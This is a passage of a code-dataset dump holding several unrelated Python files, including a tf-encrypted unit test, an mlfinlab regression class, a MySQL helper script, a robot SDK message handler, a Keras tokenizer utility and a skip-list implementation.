<tr><td>%d.</td><td>%s</td><td>%s</td></tr>
\\n' )\n\t\t\n\tix.close()\n\n\n","sub_path":"SeriesMgr/HelpIndex.py","file_name":"HelpIndex.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244472927","text":"import unittest\n\nimport numpy as np\nimport tensorflow as tf\nimport tf_encrypted as tfe\n\nfrom tf_encrypted.tensor.int100 import int100factory\nfrom tf_encrypted.tensor.prime import PrimeFactory\n\n\nclass TestLSB(unittest.TestCase):\n\n def setUp(self):\n # self.M = 2 ** 15 - 1 # this one works\n self.M = 2 ** 15 + 27 # this one doesn't\n # self.M = 2 ** 31 - 3 # this one definitely doesn't\n x = np.random.choice(self.M, (50,))\n # x = np.array([1,2,3,4])\n f_bin = np.vectorize(np.binary_repr)\n f_get = np.vectorize(lambda x, ix: x[ix])\n self.expected_lsb = f_get(f_bin(x), -1).astype(np.int32)\n self.x = x.astype(np.float32)\n\n def _core_lsb(self, tensor_factory, prime_factory):\n\n with tfe.protocol.SecureNN(\n tensor_factory=tensor_factory,\n prime_factory=prime_factory,\n ) as prot:\n\n x_in = prot.define_private_variable(self.x, apply_scaling=False, name='test_lsb_input')\n x_lsb = prot.lsb(x_in)\n\n with tfe.Session() as sess:\n sess.run(tf.global_variables_initializer())\n lsb = sess.run(x_lsb.reveal(), tag='lsb')\n\n np.testing.assert_array_equal(self.expected_lsb, lsb)\n\n def test_lsb(self):\n prime_factory = PrimeFactory(self.M)\n # self._core_lsb(prime_factory, prime_factory)\n self._core_lsb(int100factory, prime_factory)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_lsb.py","file_name":"test_lsb.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505162001","text":"# Copyright 2019, Hudson and Thames Quantitative Research\r\n# All rights reserved\r\n# Read more: https://github.com/hudson-and-thames/mlfinlab/blob/master/LICENSE.txt\r\n\r\n\"\"\"\r\nImplementation of historically weighted regression method based on relevance.\r\n\"\"\"\r\n# pylint: disable=invalid-name\r\n\r\nimport warnings\r\nfrom typing import Tuple\r\nimport numpy as np\r\n\r\nfrom mlfinlab.util import devadarsh\r\n\r\n\r\nclass HistoryWeightRegression:\r\n \"\"\"\r\n The class that houses all related methods for the historically weighted regression tool.\r\n \"\"\"\r\n\r\n def __init__(self, Y_train: np.array, X_train: np.array, check_condi_num: bool = False):\r\n \"\"\"\r\n Instantiate the class with data.\r\n\r\n :param Y_train: (np.array) The 1D (n, ) dependent data vector.\r\n :param X_train: (np.array) The 2D (n-by-k) independent data vector, n: num of instances, k: num of variables\r\n or features.\r\n :param check_condi_num: (bool) Optional. Whether to check the condition number of the covariance matrix and\r\n fisher info matrix from the training data X (Their values are the same). If this number is too large then it\r\n may lead to numerical issues. Defaults to False. 
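The expected-LSB setup in the tf-encrypted test above goes through binary_repr strings; the same values fall out of plain bitwise arithmetic (an equivalent sketch for the non-negative inputs used here):

import numpy as np

M = 2 ** 15 + 27
x = np.random.choice(M, (50,))
# x & 1 is the least significant bit, matching binary_repr(x)[-1].
expected_lsb = (x & 1).astype(np.int32)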
Toggle this off to save some computing time.\r\n \"\"\"\r\n\r\n self.X = X_train.copy()\r\n self.Y = Y_train.copy()\r\n self.X_avg = np.average(self.X, axis=0) # Columnwise average for the training data, a vector.\r\n self.Y_avg = np.average(self.Y) # Average for the dependent data, a float.\r\n\r\n # Covariance matrix from X and inverse of the covariance matrix, (effectively the Fisher info matrix)\r\n self.cov_mtx, self.fisher_info_mtx = self._calc_cov_and_fisher(X=self.X, check_condi_num=check_condi_num)\r\n\r\n devadarsh.track('HistoryWeightRegression')\r\n\r\n def get_fit_result(self) -> dict:\r\n \"\"\"\r\n Fit result and statistics using the training data.\r\n\r\n :return: (dict) The fit result and associated statistics.\r\n \"\"\"\r\n\r\n results = {'Covariance matrix': self.cov_mtx,\r\n 'Inv of cov matrix': self.fisher_info_mtx,\r\n 'Condition number of cov': np.linalg.cond(self.cov_mtx),\r\n 'Cov mtx shape': self.cov_mtx.shape}\r\n\r\n return results\r\n\r\n def predict(self, X_t: np.array, relev_ratio_threshold: float = 1) -> np.array:\r\n \"\"\"\r\n Predict the result using fitted model from a subsample chosen by the ratio of relevance.\r\n\r\n For example, if relev_ratio_threshold = 0.4, then it chooses the top 40 percentile data ranked by relevance to\r\n x_t. This method returns the prediction in column 0, also returns the associated prediction standard\r\n deviations in the column 1.\r\n\r\n For each row element x_t in X_t we have the following:\r\n y_t := y_avg + 1/(n-1) * sum{relevance(x_i, x_t) * (y_i - y_avg), subsample}\r\n where y_i, x_i are from subsamples. The matrix form is:\r\n y_t := y_avg + 1/(n-1) * (x_t - x_avg).T @ fisher_info_mtx @ (X_sub - x_avg).T @ (y_sub - y_avg)\r\n\r\n :param X_t: (np.array) The 2D (n_t-by-k) test data, n_t is the number of instances, k is the number of\r\n variables or features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1]. For example, 0.6 corresponds to the top 60 percentile data\r\n ranked by relevance to x_t. Defaults to 1.\r\n :return: (np.array) The predicted results in col 0, and standard deviations in col 1.\r\n \"\"\"\r\n\r\n # Apply for each row for X_t.\r\n Y_predicts = np.apply_along_axis(self.predict_one_val, axis=1, arr=X_t,\r\n relev_ratio_threshold=relev_ratio_threshold)\r\n\r\n return Y_predicts\r\n\r\n def predict_one_val(self, x_t: np.array, relev_ratio_threshold: float = 1) -> Tuple[float, float]:\r\n \"\"\"\r\n Predict one value using fitted model from a subsample chosen by the ratio of relevance.\r\n\r\n For example, if relev_ratio_threshold = 0.4, then it chooses the top 40 percentile data ranked by relevance to\r\n x_t. This method also returns the associated prediction standard deviations.\r\n\r\n y_t := y_avg_sub + 1/(n-1) * sum{relevance(x_i, x_t) * (y_i - y_avg_sub), subsample}\r\n where y_i, x_i are from subsamples. The equivalent matrix form is:\r\n y_t := y_avg_sub + 1/(n-1) * (x_t - x_avg).T @ fisher_info_mtx @ (X_sub - x_avg).T @ (y_sub - y_avg_sub)\r\n\r\n :param x_t: (np.array) A single row element test data, 1D (k, 1). k is the number of features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1]. For example, 0.6 corresponds to the top 60 percentile data\r\n ranked by relevance to x_t. 
Defaults to 1.\r\n :return: (Tuple[float, float]) The predicted result and associated standard deviation.\r\n \"\"\"\r\n\r\n # 1. Find the subsample above a relevance threshold for prediction\r\n # This is different for each x_t.\r\n X_sub, Y_sub, _, pred_std = self.find_subsample(x_t, relev_ratio_threshold, above=True)\r\n\r\n # 2. Predict\r\n subsample_size = len(Y_sub)\r\n Y_avg = np.average(Y_sub)\r\n y_t = Y_avg + 1 / (subsample_size - 1) * (\r\n (x_t - self.X_avg).reshape(1, -1) @ self.fisher_info_mtx\r\n @ ((X_sub - self.X_avg).T @ (Y_sub - Y_avg)).reshape(-1, 1))\r\n\r\n return y_t[0][0], pred_std\r\n\r\n def find_subsample(self, x_t: np.array, relev_ratio_threshold: float = 1, above: bool = True) \\\r\n -> Tuple[np.array, np.array, np.array, float]:\r\n \"\"\"\r\n Find the subsamples of X and Y in the training set by relevance above or below a given threshold with x_t.\r\n\r\n For example, if relev_ratio_threshold=0.3, above=True, then it finds the top 30 percentile.\r\n If relev_ratio_threshold=0.3, above=False, then it finds the bottom 70 percentile.\r\n\r\n The standard deviation is calculated as the sqrt of the variance of y_t hat, the prediction w.r.t. x_t:\r\n var_yt_hat = [(n-1)/n^2 * var_y] + [1/n * y_mean^2] + [var_y/n + y_mean^2/(n-1)]*var_r, where\r\n var_y is the subsample variance of Y, y_mean is the subsample average of Y, var_r is the subsample variance of\r\n relevance.\r\n\r\n :param x_t: (np.array) A single row element test data, 1D (k, 1). k is the number of features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1].\r\n :param above: (bool) Optional. Whether to find the subsample above the threshold or below the threshold.\r\n :return: (Tuple[np.array, np.array, np.array, float]) The subsample for X, for Y, the corresponding\r\n indices to select the subsample and the std.\r\n \"\"\"\r\n\r\n # 1. For all occurances, find their relevance value.\r\n relevance_vals = np.apply_along_axis(func1d=self.calc_relevance, axis=1, arr=self.X, x_j=x_t)\r\n\r\n # 2. Get the index that are above/below the threshold.\r\n sorted_idx = np.argsort(relevance_vals)\r\n cutoff_idx = int(len(sorted_idx) * (1 - relev_ratio_threshold))\r\n if above:\r\n result_idx = sorted_idx[cutoff_idx:]\r\n else:\r\n result_idx = sorted_idx[:cutoff_idx]\r\n\r\n # 3. Calculate subsamples and indices\r\n X_sub = self.X[result_idx] # Fancy indexing\r\n Y_sub = self.Y[result_idx] # Fancy indexing\r\n relev_sub = relevance_vals[result_idx] # Fancy indexing\r\n\r\n # 4. Calculate standard deviation\r\n n = len(result_idx)\r\n Y_sub_var = np.var(Y_sub, ddof=1)\r\n relev_sub_var = np.var(relev_sub, ddof=1)\r\n Y_sub_mean = np.average(Y_sub)\r\n\r\n group1 = (n-1) / (n*n) * Y_sub_var\r\n group2 = (1 / n * Y_sub_mean * Y_sub_mean)\r\n group3 = relev_sub_var * (Y_sub_var / n + Y_sub_mean * Y_sub_mean / (n-1))\r\n var_yt_hat = group1 + group2 + group3\r\n std_yt_hat = np.sqrt(var_yt_hat)\r\n\r\n return X_sub, Y_sub, result_idx, std_yt_hat\r\n\r\n @staticmethod\r\n def _calc_cov_and_fisher(X: np.array, check_condi_num: bool = False) -> Tuple[np.array, np.array]:\r\n \"\"\"\r\n Find the (non-biased) covariance matrix and its inverse (fisher info matrix).\r\n\r\n i.e., cov = X.T @ X / (n-1), fisher_info_mtx = (n-1) inv(X.T @ X)\r\n\r\n :param X: (np.array) The 2D (n-by-k) independent data vector, n: num of instances, k: num of variables\r\n or features.\r\n :param check_condi_num: (bool) Optional. 
Whether to check the condition number of the covariance matrix and\r\n fisher info matrix from the training data X (Their values are the same). If this number is too large then it\r\n may lead to numerical issues. Defaults to False.\r\n :return: (Tuple[np.array, np.array]) The covariance matrix and its inverse.\r\n \"\"\"\r\n\r\n cov_mtx = np.cov(X.T)\r\n if check_condi_num:\r\n condi_num_cov = np.linalg.cond(cov_mtx)\r\n if condi_num_cov > 1e6:\r\n warnings.warn((\"The condition number for covariance matrix > 10^6. This may lead to numerical\" +\r\n \" issues, consider refactoring the original data.\"), RuntimeWarning)\r\n\r\n fisher_info_mtx = np.linalg.inv(cov_mtx)\r\n\r\n return cov_mtx, fisher_info_mtx\r\n\r\n def calc_relevance(self, x_i: np.array, x_j: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate relevance of x_i and x_j: r(x_i, x_j).\r\n\r\n r(x_i, x_j) := sim(x_i, x_j) + info(x_i) + info(x_j)\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param x_j: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The relevance value.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n sim_ij = self.calc_sim(x_i, x_j, fisher_info_mtx)\r\n info_i = self.calc_info(x_i, fisher_info_mtx)\r\n info_j = self.calc_info(x_j, fisher_info_mtx)\r\n\r\n relevance_value = sim_ij + info_i + info_j\r\n\r\n return relevance_value\r\n\r\n def calc_sim(self, x_i: np.array, x_j: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate the similarity of x_i and x_j: sim(x_i, x_j)\r\n\r\n sim(x_i, x_j) := -1/2 * (x_i - x_j).T @ fisher_info @ (x_i - x_j)\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param x_j: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The value of similarity.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n xi_m_xj_horiz = (x_i - x_j).reshape(1, -1) # Horizontal vector\r\n xi_m_xj_verti = (x_i - x_j).reshape(-1, 1) # Vertical vector\r\n\r\n sim_value = - 1 / 2 * (xi_m_xj_horiz @ fisher_info_mtx @ xi_m_xj_verti)\r\n\r\n return sim_value[0, 0]\r\n\r\n def calc_info(self, x_i: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate the informativeness of x_i: info(x_i)\r\n\r\n info(x_i) := 1/2 * (x_i - x_avg).T @ fisher_info @ (x_i - x_avg)\r\n Here x_avg is the training data average for each column.\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. 
Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The informativeness value.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n xi_m_xavg_horiz = (x_i - self.X_avg).reshape(1, -1) # Horizontal vector\r\n xi_m_xavg_verti = (x_i - self.X_avg).reshape(-1, 1) # Vertical vector\r\n\r\n infomativeness_value = 1 / 2 * (xi_m_xavg_horiz @ fisher_info_mtx @ xi_m_xavg_verti)\r\n\r\n return infomativeness_value[0, 0]\r\n","sub_path":"src/collection/mlfinlab/regression/history_weight_regression.py","file_name":"history_weight_regression.py","file_ext":"py","file_size_in_byte":12854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255560416","text":"#!/usr/bin/env python3\n# -*- encoding:utf-8 -*-\n# 关键点在于从后向前贪心,依次更新可以到后一个位置的索引值\nclass Solution:\n def canJump(self, nums):\n if not nums:\n return\n if 0 not in nums[:-1]: # 如果所有元素都不为0,那么一定可以走到最后\n return True\n end = len(nums) - 1\n for i in range(end - 1, -1, -1): # 倒着遍历,从倒数第二个数开始看\n if nums[i] + i >= end:\n end = i\n return end == 0\n# 正向\n# class Solution:\n# def canJump(self, nums) :\n# max_i = 0 #初始化最远的位置\n# for i, num in enumerate(nums):\n# if max_i >= i and i+num > max_i: # 若当前位置+跳数>最远位置\n# max_i = i+num #更新\n# return max_i>=i # 此时i为最后一位\n","sub_path":"Week_04/55_跳跃游戏.py","file_name":"55_跳跃游戏.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157266350","text":"import json\nimport ujson\n\nimport requests\nimport arrow\n\nfrom app.common.BaseDao import BaseDao\nfrom app import logger\n\n# json转换工具:https://www.json.cn/\n\n\nbaseDao = BaseDao(\"127.0.0.1\", \"3306\", \"test\", \"test\", \"test\")\n\n__SELECT_SQL = \"\"\"\n SELECT * FROM sys_user where id < 100\n \"\"\"\n\n__SELECT_SQL_PARAMS = \"\"\"\n SELECT * FROM sys_user where id < %s\n \"\"\"\n\n\n# 查询数据\ndef query_data():\n # 查询多条数据\n datas = baseDao.query_sql(__SELECT_SQL)\n logger.info(ujson.dumps(datas))\n\n # 传参查询\n datas = baseDao.query_sql(__SELECT_SQL_PARAMS, [\"100\"])\n logger.info(ujson.dumps(datas))\n\n # 传参查询,只取一条数据\n data = baseDao.query_sql(__SELECT_SQL_PARAMS, [\"100\"], first=True)\n logger.info(ujson.dumps(data))\n\n # count数据条数\n count = baseDao.query_count_sql(__SELECT_SQL_PARAMS, [\"100\"])\n logger.info(count)\n\n\n# 新增数据\ndef insert_data():\n count = baseDao.insert_sql(\"insert into test_python(name, age) values(%s, %s)\", [\"tomA\", \"20\"])\n logger.info(count)\n\n count = baseDao.insert(\"test_python\", {\"name\": \"tomB\", \"age\": \"22\"})\n logger.info(count)\n\n\n# 更新数据\ndef update_data():\n # > -1 表示更新成功\n count = baseDao.update_sql(\"update test_python set name=%s where id=%s\", [\"updateA\", \"1\"])\n logger.info(count)\n\n count = baseDao.update(\"test_python\", {\"name\": \"tom3\", \"age\": \"23\"}, \"id=%s\", [\"3\"])\n logger.info(count)\n\n\n# 事务操作\ndef exec_data():\n # > -1 表示更新成功\n\n def call(cur):\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec1\", \"1\"])\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec2\", \"2\"])\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec3\", \"3\"])\n\n baseDao.execute(call)\n\n\nif __name__ == '__main__':\n # query_data()\n # insert_data()\n # update_data()\n 
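A minimal usage sketch for the HistoryWeightRegression class above (the synthetic data and the 0.6 threshold are illustrative only):

import numpy as np

rng = np.random.default_rng(0)
X_train = rng.normal(size=(100, 3))
Y_train = X_train @ np.array([0.5, -1.0, 2.0]) + rng.normal(scale=0.1, size=100)

model = HistoryWeightRegression(Y_train, X_train)
# Predict from the top 60% of training points ranked by relevance;
# column 0 holds the predictions, column 1 the estimated standard deviations.
preds = model.predict(X_train[:5], relev_ratio_threshold=0.6)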
exec_data()\n","sub_path":"app/sync/test_mysql_001.py","file_name":"test_mysql_001.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"168517768","text":"import random\nimport datetime\nimport sys\nimport time\n\n# Obtener un valor aleatorio dentro de un rango dado\nvalor = random.randint(0, 10)\nprint(valor)\n\n# Obtener un valor aleatorio dentro de una lista de elementos\nlista = [True, \"Strings\", 23, 45.6, False]\nvalor = random.choice( lista )\nprint(valor)\n\n# Cambiar el orden de los elementos aleatoriamente\nprint(lista)\nrandom.shuffle( lista )\nprint(lista)\n\n# Obtener la hora actuar con la libreria datetime\nprint(datetime.datetime.now())\n\n# Crear un indicador de progreso en la consola\nfor i in range(100):\n time.sleep(0.2)\n sys.stdout.write(\"\\r%d %%\" % i)\n sys.stdout.flush()\n","sub_path":"cf_python/22_librerias.py","file_name":"22_librerias.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572154070","text":"import logging\nfrom .message import Message, BlockStatus, ContentCode, MessageType, ResultCode\nimport time\nfrom .connection import Connection\nimport threading\nfrom collections import OrderedDict\nimport json\nfrom .__version__ import MINIMUM_GOMER_VERSION\nimport re\nfrom .exceptions import GomerNeedsUpdate\n\n\nclass SDKRequestMessageState:\n __shared_dict = {}\n\n def __init__(self):\n self.__dict__ = self.__shared_dict\n self.block_set = set()\n self.live_messages = OrderedDict()\n # self.results =\n self.logger = logging.getLogger('gomer.message_state')\n\n def add_item(self, message):\n self.live_messages[message.content.num] = message\n self.add_to_set(message)\n\n def del_item(self, message):\n self.live_messages.pop(message.content.num)\n if message.block == BlockStatus.NEVER.value or message.block == BlockStatus.ALL.value:\n return\n self.block_set.discard(message.group)\n\n def add_to_set(self, message):\n if message.block == BlockStatus.AUTO.value and message.block is not None:\n self.block_set.add(message.group)\n\n\nstate = SDKRequestMessageState()\n_state_lock = threading.Lock()\n\n\nclass Handler:\n def __init__(self):\n self.logger = logging.getLogger('gomer.handler')\n self.checked = False\n\n def handle(self, message_queue):\n global state, _state_lock\n # live_messages = state.live_messages\n while True:\n if not message_queue.empty():\n message = json.loads(message_queue.get())\n if not self.checked:\n if self.check_version(message):\n continue\n\n message = Message.from_dict(message)\n if message.content.num in state.live_messages.keys():\n if message.is_response():\n if state.live_messages[message.content.num].check_response(message):\n continue\n elif message.is_complete():\n if state.live_messages[message.content.num].completed:\n continue\n with _state_lock:\n if state.live_messages[message.content.num].check_complete(message):\n self.response_complete(message)\n if state.live_messages[message.content.num].block != BlockStatus.ALL.value:\n state.del_item(state.live_messages[message.content.num])\n else:\n self.logger.info('....handler thread:do not konw the message type: ' + str(message))\n else:\n time.sleep(0.01)\n\n def response_complete(self, message):\n message.message_type = MessageType.RESPONSE.value\n message.code = ResultCode.SUCCESS.value\n Connection().send(str(message))\n\n def check_version(self, message):\n if 
message.get('hard') is not None:\n version = message.get('hard').get('ver')\n pattern = r'(\\d+).(\\d+).(\\d+)'\n gomer_version = re.match(pattern, version)\n gomer_version = (\n int(gomer_version.group(1)), int(gomer_version.group(2)), int(gomer_version.group(3)))\n if gomer_version >= MINIMUM_GOMER_VERSION:\n self.checked = True\n return True\n else:\n raise GomerNeedsUpdate('Gomer version is: {}, minimun version required is: {}.{}.{}. '\n 'You can update your gomer via Gomer Android APP.'\n .format(version, MINIMUM_GOMER_VERSION[0], MINIMUM_GOMER_VERSION[1],\n MINIMUM_GOMER_VERSION[2]))\n\n\nclass MessageSender:\n def __init__(self):\n self.logger = logging.getLogger('gomer.message_sender')\n global state, _state_lock\n\n def send_original(self, message):\n Connection().send(message)\n\n def send(self, message):\n self.logger.info(\"start message: {}\".format(message))\n self.wait_for_send(message)\n Connection().send(str(message))\n with _state_lock:\n state.add_item(message)\n self.wait_for_response(message)\n self.interrupt_previous_message(message)\n if message.block == BlockStatus.ALL.value:\n while not state.live_messages[message.content.num].completed:\n time.sleep(0.01)\n self.logger.info(\"message complete\")\n\n complete_content = state.live_messages[message.content.num].complete_message.content.to_dict()\n with _state_lock:\n state.del_item(message)\n return complete_content\n return None\n\n def wait_for_send(self, message):\n while message.group in state.block_set:\n time.sleep(0.01)\n\n def interrupt_previous_message(self, message):\n if message.content.num not in state.live_messages.keys():\n return False\n with _state_lock:\n for key in state.live_messages.keys():\n if key < message.content.num and state.live_messages[key].group == message.group:\n break\n else:\n key = None\n if key:\n state.live_messages.pop(key)\n\n def wait_for_response(self, message):\n id = message.content.num\n while id in state.live_messages.keys():\n if state.live_messages[id].responsed:\n return\n time.sleep(0.01)\n\n @staticmethod\n def upload(file_type, path):\n Connection().upload(file_type=file_type, path=path)\n\n def open_video(self):\n Connection().open_video()\n\n def close_video(self):\n Connection().close_video()\n\n def open_video_data(self):\n Connection().open_video_data()\n\n def close_video_data(self):\n Connection().close_video_data()\n","sub_path":"gomer/transceiver.py","file_name":"transceiver.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625052274","text":"# coding: utf-8\n\nfrom keras.preprocessing.text import Tokenizer\n\nimport json\nfrom collections import OrderedDict\n\n\ndef create_and_save_tokenizer(data, num_words, outfilename):\n tokenizer = Tokenizer(oov_token='UNK', num_words=num_words+1)\n tokenizer.fit_on_texts(data)\n tokenizer.word_index = {e: i for e, i in tokenizer.word_index.items() if i <= num_words}\n tokenizer.word_index[tokenizer.oov_token] = num_words + 1\n\n tokenizer_dict = {\n \"word_counts\": list(tokenizer.word_counts.items()),\n \"word_docs\": tokenizer.word_docs,\n \"word_index\": tokenizer.word_index,\n \"document_count\": tokenizer.document_count,\n \"index_docs\": tokenizer.index_docs\n }\n\n with open(outfilename, 'w') as outfile:\n json.dump(tokenizer_dict, outfile)\n\n\ndef load_tokenizer_from_file(filename):\n \n tokenizer = Tokenizer()\n\n with open(filename, 'r') as infile:\n tokenizer_data = json.load(infile)\n\n tokenizer.word_counts 
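A tiny illustration of the tuple comparison behind check_version above (the version strings are made up):

import re

MINIMUM = (1, 2, 0)
m = re.match(r'(\d+).(\d+).(\d+)', '1.10.3')
version = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
# Tuples compare element-wise, so (1, 10, 3) >= (1, 2, 0) is True,
# while plain string comparison would wrongly rank '1.10.3' below '1.2.0'.
assert version >= MINIMUM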
= OrderedDict(tokenizer_data['word_counts'])\n tokenizer.word_docs = tokenizer_data['word_docs']\n tokenizer.word_index = tokenizer_data['word_index']\n tokenizer.document_count = tokenizer_data['document_count']\n tokenizer.index_docs = tokenizer_data['index_docs']\n\n return tokenizer\n","sub_path":"python/tokenizing.py","file_name":"tokenizing.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276617413","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport random \n \nclass Node: #Class used to create a node for the skip list\n\n def __init__(self, value, level): \n self.value = value \n \n # This list will hold references to nodes on different levels \n self.forward = [None]*(level+1) \n \n \nclass SkipList: #Class to create a skiplist having a certain number of levels and probability of the level of a new node\n\n def __init__(self, max_lvl, P): \n # Maximum level for this skip list \n self.max_lvl= max_lvl \n \n #The skip list has a probability p associated with it, where 0 self.level: \n for i in range(self.level+1, rlevel+1): \n update[i] = self.header \n self.level = rlevel \n \n # create new node with random level generated \n n = self.createNode(rlevel, value) \n \n # insert node by rearranging references \n for i in range(rlevel+1): \n n.forward[i] = update[i].forward[i] \n update[i].forward[i] = n \n print(\"The value {} has been inserted.\".format(value)) \n print(\"\")\n \n def Delete(self, search_value): \n #The update array is important here too: it keeps track of nodes whose pointers may\n #need to change to “unsplice” the to-be-deleted node\n\n # create update array and initialize it \n update = [None]*(self.max_lvl+1) \n current = self.header \n\n \n #We start from highest level of skip list and\n #move the current reference forward, while the value \n #is greater than value of node next to current.\n #Otherwise, the current node gets inserted into update[] and \n # we move one level down and continue searching linearly for the node that needs to be deleted\n \n for i in range(self.level, -1, -1): \n while(current.forward[i] and current.forward[i].value < search_value): \n current = current.forward[i] \n update[i] = current \n\n \n #Reached level 0 and advanced reference to node on the\n #right, which is possibly the node we want to delete \n \n current = current.forward[0] \n\n \n if current != None and current.value == search_value: # If current node is the node to be deleted\n\n \n #The we start from lowest level and rearrange references \n #just as it is done in a singly linked list\n #when removing a particular node.\n \n for i in range(self.level+1): \n\n \n #If at level i, next node is not target \n #node, break the loop, and do not need move to a further level \n \n if update[i].forward[i] != current: \n break\n update[i].forward[i] = current.forward[i] \n\n # If there are levels that no longer have any elements residing in it, then remove those levels\n while(self.level>0 and self.header.forward[self.level] == None): \n self.level=self.level-1\n print(\"Successfully deleted {}\".format(search_value)) \n \n \n \n#We want to search for a node of a specific value , so we start from first node of “express lane”/ uppermost level\n#and keep moving on “express lane” until we \n#find a node that has a next node value greater than the value we are looking for. 
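The SkipList class above appears to have lost its createNode and randomLevel methods to the same markup-stripping that mangled other files in this dump (the text jumps from the probability comment into the middle of insertion). Typical versions of the missing methods, reconstructed from the surviving calls and assuming __init__ stores the probability as self.P; this is my reconstruction, not the verbatim original:

    def createNode(self, lvl, value):
        # Each node carries lvl+1 forward references, one per level.
        return Node(value, lvl)

    def randomLevel(self):
        # Keep promoting the node while coin flips land below P,
        # capping the result at the list's maximum level.
        lvl = 0
        while random.random() < self.P and lvl < self.max_lvl:
            lvl += 1
        return lvl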
\n\n#Once we find such a node on “express lane”,we move to “normal lane”/lower level using a pointer from this node, \n#and linearly search for 50 on “normal lane”. \n\n#Specifically, we start from highest level of the skip list \n #and move the current reference forward while the value of the node \n #is greater than the current node's next node's value.\n#Otherwise, move one level down and continue searching \n \n def Search(self, value): \n current = self.header\n \n \n for i in range(self.level, -1, -1): \n while(current.forward[i] and current.forward[i].value < value): \n current = current.forward[i] \n \n # reached level 0 and advance reference to \n # right, which is prssibly our desired node \n current = current.forward[0] \n \n # If current node have key equal to \n # search key, we have found our target node \n if current and current.value == value: \n print(\"Found the key: {} \".format(value))\n \n \n \n def PrintSkipList(self): \n print(\"\\n----Skip List----\") \n head = self.header \n \n for lvl in range(self.level+1): \n print(\"Level {}: \".format(lvl), end=\" \")\n node = head.forward[lvl] \n \n while(node != None): \n print(node.value, end=\" \") \n node = node.forward[lvl] \n print(\"\")\n \n\n#DRIVER CODE:\nskip_lst = SkipList(3, 0.5) \nskip_lst.Insert(3) \nskip_lst.Insert(6) \nskip_lst.Insert(7) \nskip_lst.Insert(9) \nskip_lst.Insert(12) \nskip_lst.Insert(19) \nskip_lst.Insert(17) \nskip_lst.Insert(26) \nskip_lst.Insert(21) \nskip_lst.Insert(25) \n\nskip_lst.PrintSkipList() \n \n# Search for node 21\nskip_lst.Search(21) \n \n# Delete node 21 \nskip_lst.Delete(21) \n\nprint(\"\")\nprint(\"\")\nprint(\"The Skip List After Deletion:\")\nskip_lst.PrintSkipList() \n \n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Skip List, (19B-094-SE and 19B-127-SE), DSA PROJECT CODE IMPLEMENTATION.py","file_name":"Skip List, (19B-094-SE and 19B-127-SE), DSA PROJECT CODE IMPLEMENTATION.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190360808","text":"\"\"\"getlist_problem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
